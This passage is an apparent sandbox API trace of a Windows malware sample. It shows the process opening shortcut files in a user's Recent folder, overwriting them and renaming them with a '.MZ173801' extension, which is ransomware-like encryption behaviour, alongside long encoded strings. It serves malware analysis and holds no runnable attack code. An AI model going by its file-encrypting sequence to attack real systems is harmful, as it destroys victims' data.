[0113.149] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.149] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.149] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_HdsGmu6OGd.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\_hdsgmu6ogd.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75ec2c33, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75ec2c33, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75ec3fc4, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5b9)) returned 1 [0113.150] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.150] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0113.150] GetCurrentThreadId () returned 0x1358 [0113.150] GetCurrentThreadId () returned 0x1358 [0113.150] GetCurrentThreadId () returned 0x1358 [0113.151] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.151] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0113.151] GetCurrentThreadId () returned 0x1358 [0113.151] GetCurrentThreadId () returned 0x1358 [0113.151] GetCurrentThreadId () returned 0x1358 [0113.151] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_HdsGmu6OGd.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\_hdsgmu6ogd.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0113.151] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0113.151] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.151] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x5b9 [0113.151] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.151] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x5b9, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x5b9, lpOverlapped=0x0) returned 1 [0113.152] CloseHandle (hObject=0x3f4) returned 1 [0113.152] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_HdsGmu6OGd.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\_hdsgmu6ogd.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0113.153] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x5b9, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x5b9, lpOverlapped=0x0) returned 1 [0113.154] CloseHandle (hObject=0x3f4) returned 1 [0113.155] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_HdsGmu6OGd.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\_hdsgmu6ogd.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_HdsGmu6OGd.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\_hdsgmu6ogd.lnk.mz173801")) returned 1 [0113.156] GetCurrentThreadId () returned 0x1358 [0113.156] GetCurrentThreadId () returned 0x1358 [0113.156] GetCurrentThreadId () returned 0x1358 [0113.156] GetCurrentThreadId () returned 0x1358 [0113.156] GetCurrentThreadId () returned 0x1358 [0113.156] GetCurrentThreadId () returned 0x1358 [0113.156] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75ec2c33, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75ec2c33, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75ec3fc4, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5b9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="_HdsGmu6OGd.lnk", cAlternateFileName="_HDSGM~1.LNK")) returned 0 [0113.156] GetLastError () returned 0x12 [0113.156] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0113.156] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x34791fac, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa4b83c6d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa4b83c6d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0113.156] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0113.156] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.156] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x34791fac, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa4b83c6d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa4b83c6d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0113.156] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.156] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.156] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74f80461, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x74f80461, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa0c6d571, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4fd, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="0VlS.lnk.MZ173801", cAlternateFileName="0VLSLN~1.MZ1")) returned 1 [0113.156] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.156] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.157] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea33ce68, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x88bbf03a, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa0c936c5, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x418, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="1Zion8xjlGTdeA8sDujv.lnk.MZ173801", cAlternateFileName="1ZION8~1.MZ1")) returned 1 [0113.157] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.157] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.157] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5eb967, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea5eb967, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa0c936c5, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3c6, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="28RvPNiENM.lnk.MZ173801", cAlternateFileName="28RVPN~1.MZ1")) returned 1 [0113.157] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.157] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.157] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x786dd421, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x786dd421, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa0c936c5, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x424, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="2ffpB.lnk.MZ173801", cAlternateFileName="2FFPBL~1.MZ1")) returned 1 [0113.157] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.157] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.157] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dafc545, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x8dafc545, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa0d2c22b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x398, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="2n q.lnk.MZ173801", cAlternateFileName="2NQLNK~1.MZ1")) returned 1 [0113.157] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.157] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.157] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x764a5940, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x764a5940, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa0d2c22b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x32f, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="3067xe8riKxNNoH.lnk.MZ173801", cAlternateFileName="3067XE~1.MZ1")) returned 1 [0113.157] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.157] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.157] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec3b904a, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xecf289d4, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa0d52562, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x413, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="3MH4hI_B2Y4fI4Q-s4O.lnk.MZ173801", cAlternateFileName="3MH4HI~1.MZ1")) returned 1 [0113.157] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.157] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.157] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9940cd4, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9940cd4, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa0d52562, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3e9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="4DBo0atmEpeC-LN5J.lnk.MZ173801", cAlternateFileName="4DBO0A~1.MZ1")) returned 1 [0113.157] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.157] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.157] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6f686d, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea6f686d, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa0dead98, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="51xMNOj.flv.lnk.MZ173801", cAlternateFileName="51XMNO~1.MZ1")) returned 1 [0113.157] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.157] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.157] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3d5659, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea3d5659, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa0dead98, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x52b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="5iO4NXS5B547.lnk.MZ173801", cAlternateFileName="5IO4NX~1.MZ1")) returned 1 [0113.157] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.157] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.157] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea0b4498, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xead5ee94, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa0e10eb9, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x33b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="5xR3.lnk.MZ173801", cAlternateFileName="5XR3LN~1.MZ1")) returned 1 [0113.157] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: 